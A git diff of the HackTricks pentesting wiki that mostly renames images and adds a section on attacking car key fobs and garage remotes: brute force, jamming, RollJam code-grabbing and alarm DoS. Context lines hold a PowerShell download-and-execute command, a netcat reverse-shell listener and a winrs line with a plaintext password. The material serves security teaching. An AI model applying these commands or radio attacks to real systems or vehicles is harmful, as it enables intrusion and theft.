diff --git a/.gitbook/assets/image (2) (6) (2).png b/.gitbook/assets/image (2) (6) (2).png new file mode 100644 index 000000000..aa2d624c1 Binary files /dev/null and b/.gitbook/assets/image (2) (6) (2).png differ diff --git a/.gitbook/assets/image (2) (6).png b/.gitbook/assets/image (2) (6).png index aa2d624c1..5109dd9b3 100644 Binary files a/.gitbook/assets/image (2) (6).png and b/.gitbook/assets/image (2) (6).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index 5109dd9b3..8cbefda25 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (3) (1) (4).png b/.gitbook/assets/image (3) (1) (4).png new file mode 100644 index 000000000..7ed352b60 Binary files /dev/null and b/.gitbook/assets/image (3) (1) (4).png differ diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png index 7ed352b60..c65f8a06e 100644 Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png index c65f8a06e..884a59fd2 100644 Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (4) (5) (1).png b/.gitbook/assets/image (4) (5) (1).png new file mode 100644 index 000000000..efc07ea78 Binary files /dev/null and b/.gitbook/assets/image (4) (5) (1).png differ diff --git a/.gitbook/assets/image (4) (5).png b/.gitbook/assets/image (4) (5).png index efc07ea78..786ef2095 100644 Binary files a/.gitbook/assets/image (4) (5).png and b/.gitbook/assets/image (4) (5).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index 786ef2095..1ad2a58a1 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image (5) (4).png b/.gitbook/assets/image (5) (4).png new file mode 100644 index 000000000..63d09319b Binary files /dev/null and b/.gitbook/assets/image (5) (4).png differ diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png index 63d09319b..8d9417666 100644 Binary files a/.gitbook/assets/image (5).png and b/.gitbook/assets/image (5).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index 884a59fd2..ae902527d 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/linux-hardening/freeipa-pentesting.md b/linux-hardening/freeipa-pentesting.md index 112f604d0..5cc85c10e 100644 --- a/linux-hardening/freeipa-pentesting.md +++ b/linux-hardening/freeipa-pentesting.md @@ -96,7 +96,7 @@ CCACHE Tickets \*\*\*\* can also be **stored** in \*\*\*\* the Linux **keyring** Depending on how the administrator scoped the ticket stored inside of the Unix keyring, parsing it out may be difficult. However, the **default** **scope** for CCACHE Tickets in the Unix keyring is **`KEYRING:persistent:uidnumber`**. Fortunately if you are in the **context** of the **user**, `klist` can **parse** this information for us. -
+
As an attacker, **re-using a CCACHE** Ticket stored in the Unix **keyring** is fairly **difficult** depending on how the ticket is scoped. Fortunately [@Zer1t0](https://github.com/Zer1t0) from [@Tarlogic](https://twitter.com/Tarlogic) has built a tool that can extract Kerberos tickets from the Unix keyring. The tool is called **Tickey** and can be found [**here**](https://github.com/TarlogicSecurity/tickey). diff --git a/linux-hardening/privilege-escalation/docker-breakout/cgroups.md b/linux-hardening/privilege-escalation/docker-breakout/cgroups.md index f1d375aea..7ace7c54d 100644 --- a/linux-hardening/privilege-escalation/docker-breakout/cgroups.md +++ b/linux-hardening/privilege-escalation/docker-breakout/cgroups.md @@ -89,7 +89,7 @@ An exception to these rules is the **root cgroup** found at the bottom of the hi Even with no controllers enabled, you can see the CPU usage of a cgroup by looking at its cpu.stat file: -
+
Because this is the accumulated CPU usage over the entire lifespan of the cgroup, you can see how a service consumes processor time even if it spawns many subprocesses that eventually terminate. diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md index 5f99cb564..b7eb0f03f 100644 --- a/network-services-pentesting/8089-splunkd.md +++ b/network-services-pentesting/8089-splunkd.md @@ -2,13 +2,13 @@
-πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ +πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe The next step is to choose `Install app from file` and upload the application. -
+
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat). @@ -104,7 +104,7 @@ sudo nc -lnvp 443 listening on [any] 443 ... ``` -On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. **** As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. +On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. \*\*\*\* As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. #### Linux @@ -135,12 +135,12 @@ In the following page you can find an explanation how this service can be abused
-πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ +πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md index bb5f7eaf9..6feb3b3c7 100644 --- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md @@ -124,7 +124,7 @@ If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Nod ``` -
+
## RCE: preload diff --git a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md index c80b998a0..493893c73 100644 --- a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md +++ b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md @@ -100,7 +100,7 @@ Then, the attacker could use those **100 connections** to perform a **search bru Yes, it's possible to generate 100000 temporary files in an EC2 medium size instance: -
+
## Nginx diff --git a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md index fe3e75618..12d7ebc25 100644 --- a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md +++ b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md @@ -1,4 +1,4 @@ -# FZ - Sub-Ghz +# FZ - Sub-GHz
@@ -16,7 +16,7 @@ Flipper Zero can **receive and transmit radio frequencies in the range of 300-928 MHz** with its built-in module, which can read, save, and emulate remote controls. These controls are used for interaction with gates, barriers, radio locks, remote control switches, wireless doorbells, smart lights, and more. Flipper Zero can help you to learn if your security is compromised. -
+
## Sub-GHz hardware diff --git a/todo/radio-hacking/sub-ghz-rf.md b/todo/radio-hacking/sub-ghz-rf.md index 1246ad528..34cc20ca3 100644 --- a/todo/radio-hacking/sub-ghz-rf.md +++ b/todo/radio-hacking/sub-ghz-rf.md @@ -21,9 +21,33 @@ Garage door openers typically operate at frequencies in the 300-190 MHz range, w Most car key fobs operate on either **315 MHz or 433 MHz**. These are both radio frequencies, and they are used in a variety of different applications. The main difference between the two frequencies is that 433 MHz has a longer range than 315 MHz. This means that 433 MHz is better for applications that require a longer range, such as remote keyless entry.\ In Europe 433.92MHz is commonly used and in U.S. and Japan it's the 315MHz. -## Security +## **Brute-force Attack** -### Rolling Codes +
+ +If instead of sending each code 5 times (sent like this to make sure the receiver gets it) so just send it once, the time is reduced to 6mins: + +
+ +and if you **remove the 2 ms waiting** period between signals you can **reduce the time to 3minutes.** + +Moreover, by using the De Bruijn Sequence (a way to reduce the number of bits needed to send all the potential binary numbers to burteforce) this **time is reduced just to 8 seconds**: + +
+ +Example of this attack was implemented in [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame) + +Requiring a preamble will avoid the De Bruijn Sequence optimization and rolling codes will prevent this attack. + +## Sub-GHz Attack + +To attack these signals with Flipper Zero check: + +{% content-ref url="flipper-zero/fz-sub-ghz.md" %} +[fz-sub-ghz.md](flipper-zero/fz-sub-ghz.md) +{% endcontent-ref %} + +## Rolling Codes Protection Automatic garage door openers typically use a wireless remote control to open and close the garage door. The remote control **sends a radio frequency (RF) signal** to the garage door opener, which activates the motor to open or close the door. @@ -33,17 +57,40 @@ The **RF signal is typically transmitted using a rolling code**, which means tha In a rolling code system, the remote control and the garage door opener have a **shared algorithm** that **generates a new code** every time the remote is used. The garage door opener will only respond to the **correct code**, making it much more difficult for someone to gain unauthorised access to the garage just by capturing a code. -## Attack +### **Missing Link Attack** -To attack these signals with Flipper Zero check: +Basically, you listen for the button and **capture the signal whilst the remote is out of range** of the device (say the car or garage). You then move to the device and **use the captured code to open it**. -{% content-ref url="flipper-zero/fz-sub-ghz.md" %} -[fz-sub-ghz.md](flipper-zero/fz-sub-ghz.md) -{% endcontent-ref %} +### Full Link Jamming Attack + +An attacker could **jam the signal near the vehicle or receive**r so the **receiver cannot actually β€˜hear’ the code**, and once that is happening you can simply **capture and replay** the code when you have stopped jamming. + +The victim at some point will use the **keys to lock the car**, but then the attack will have **recorded enough "close door" codes** that hopefully could be resent to open the door (a **change of frequency might be needed** as there are cars that use the same codes to open and close but listens for both commands in different frequencies). + +{% hint style="warning" %} +**Jamming works**, but it's noticeable as if the **person locking the car simply tests the doors** to ensure they are locked they would notice the car unlocked. Additionally if they were aware of such attacks they could even listen to the fact that the doors never made the lock **sound** or the cars **lights** never flashed when they pressed the β€˜lock’ button. +{% endhint %} + +### **Code Grabbing Attack ( aka β€˜RollJam’ )** + +This is a more **stealth Jamming technique**. The attacker will jam the signal, so when the victim tries to lock the door it won't work, but the attacker will **record this code**. Then, the victim will **try to lock the car again** pressing the button and the car will **record this second code**.\ +Instantly after this the **attacker can send the first code** and the **car will lock** (victim will think the second press closed it). Then, the attacker will be able to **send the second stolen code to open** the car (supposing that a **"close car" code can also be used to open it**). A change of frequency might be needed (as there are cars that use the same codes to open and close but listens for both commands in different frequencies). + +The attacker can **jam the car receiver and not his receiver** because if the car receiver is listening in for example a 1MHz broadband, the attacker won't **jam** the exact frequency used by the remote but **a close one in that spectrum** while the **attackers receiver will be listening in a smaller range** where he can listen the remote signal **without the jam signal**. + +{% hint style="warning" %} +Other implementations seen in specifications show that the **rolling code is a portion** of the total code sent. Ie the code sent is a **24 bit key** where the first **12 are the rolling code**, the **second 8 are the command** (such as lock or unlock) and the last 4 is the **checksum**. Vehicles implementing this type are also naturally susceptible as the attacker merely needs to replace the rolling code segment to be able to **use any rolling code on both frequencies**. +{% endhint %} + +### Alarm Sounding Jamming Attack + +Testing against an aftermarket rolling code system installed on a car, **sending the same code twice** immediately **activated the alarm** and immobiliser providing a unique **denial of service** opportunity. Ironically the means of **disabling the alarm** and immobiliser was to **press** the **remote**, providing an attacker with the ability to **continually perform DoS attack**. Or mix this attack with the **previous one to obtain more codes** as the victim would like to stop the attack asap. ## References * [https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/](https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/) +* [https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/](https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/) +* [https://samy.pl/defcon2015/](https://samy.pl/defcon2015/)
diff --git a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md index a2321fcfa..ad90a0d80 100644 --- a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md +++ b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md @@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_: -
+
### OpenSSH diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md index bb2b18249..5bb851e5f 100644 --- a/windows-hardening/av-bypass.md +++ b/windows-hardening/av-bypass.md @@ -169,7 +169,7 @@ It allows antivirus solutions to inspect script behavior by exposing script cont Running `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` will produce the following alert on Windows Defender. -
+
Notice how it prepends `amsi:` and then the path to the executable from which the script ran, in this case, powershell.exe